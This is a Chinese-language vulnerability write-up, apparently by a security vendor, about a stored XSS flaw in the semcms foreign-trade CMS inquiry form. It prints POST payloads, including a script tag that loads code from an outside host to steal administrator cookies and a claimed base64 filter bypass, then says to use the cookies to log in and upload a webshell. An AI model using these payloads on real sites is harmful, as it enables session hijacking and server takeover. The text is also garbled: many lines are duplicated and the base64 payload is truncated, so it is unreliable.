emcms是國內第一個開源外貿的網站管理系統,目前大多數的外貿網站都是用的semcms
系統,該系統兼容許多瀏覽器,像IE,google,360極速瀏覽器都能非常好的兼容,官方semcms有
php版本,asp版本,我們esafe對其安全檢測的同時發現該系統存在高危的網站漏洞,該漏洞影響
版本semcms 2.6 2.7 2.8,包括目前最新的semcms 3.2版本漏洞。
我們來下載最新版本的semcms系統到我們本地電腦,打開發現網站採用的是php+mysql架構開
發的系統,phpstudy配置PHP環境以及mysql數據庫環境,網站搭建起來,如下圖,這個是前
端:
發的系統,phpstudy配置PHP環境以及mysql數據庫環境,網站搭建起來,如下圖,這個是前
端:
這個是網站的後台系統:
該漏洞是在網站產品的留言功能裡發現的,存在著XSS跨站漏洞,點擊詢盤我們抓包來看下數據包
裡的內容,發現可以更改tile標題這個值,通過修改留言標題的這個值我們偽造發送到主機端
去,並隨即登錄網站後台查看到留言,並執行了我們的XSS代碼,構造的代碼如下:
裡的內容,發現可以更改tile標題這個值,通過修改留言標題的這個值我們偽造發送到主機端
去,並隨即登錄網站後台查看到留言,並執行了我們的XSS代碼,構造的代碼如下:
title=安全測試
"><img>&content=88888888&Company=&Name=8888888&mail=8888888qq.com&Ph
one=13888888888&Fax=&Region=9999999999&Home=&yzm=6789&Submit=Submit
one=13888888888&Fax=&Region=9999999999&Home=&yzm=6789&Submit=Submit
我們直接post過去,看到html標籤欄裡是否存在xss漏洞,semcms已經過濾了一些常用的XSS代
碼,所以一些簡單的彈窗測試漏洞都屏蔽了,只能使用一些加密的特殊xss跨站代碼。我們來構
造一下可以獲取管理員的cookies值的一個代碼:
title=1111<script src="https://www.esafe.tw.com/c"></script>安全測試
&content=66666666&Company=&Name=8888888&mail=888888@qq.com&Phone=13
58855555555&Fax=&Region=5888&Home=112233&yzm=7878&Submit=Submit
碼,所以一些簡單的彈窗測試漏洞都屏蔽了,只能使用一些加密的特殊xss跨站代碼。我們來構
造一下可以獲取管理員的cookies值的一個代碼:
title=1111<script src="https://www.esafe.tw.com/c"></script>安全測試
&content=66666666&Company=&Name=8888888&mail=888888@qq.com&Phone=13
58855555555&Fax=&Region=5888&Home=112233&yzm=7878&Submit=Submit
當我們發送過去後,發現網站會過濾掉一些//號,但是可以編碼64位加密繞過直接post提交
過去。加密可以繞過的代碼:
過去。加密可以繞過的代碼:
title=1111
<script src="dGl0bGU9MTExMSZsdDtzY3JpcHQgc3JjPSJodHRwczovL3d3dy5zaW">
</script>安全測試
&content=66666666&Company=&Name=8888888&mail=888888@qq.com&Phon
e=1358855555555&Fax=&Region=5888&Home=112233&yzm=7878&Submit=Submit
<script src="dGl0bGU9MTExMSZsdDtzY3JpcHQgc3JjPSJodHRwczovL3d3dy5zaW">
</script>安全測試
&content=66666666&Company=&Name=8888888&mail=888888@qq.com&Phon
e=1358855555555&Fax=&Region=5888&Home=112233&yzm=7878&Submit=Submit
發送過去我們發現提交成功並成功獲取到了網站的管理員cookies值,我們利用cookies進行登錄
後台,上傳我們的網站木馬到網站裡去即可。
後台,上傳我們的網站木馬到網站裡去即可。
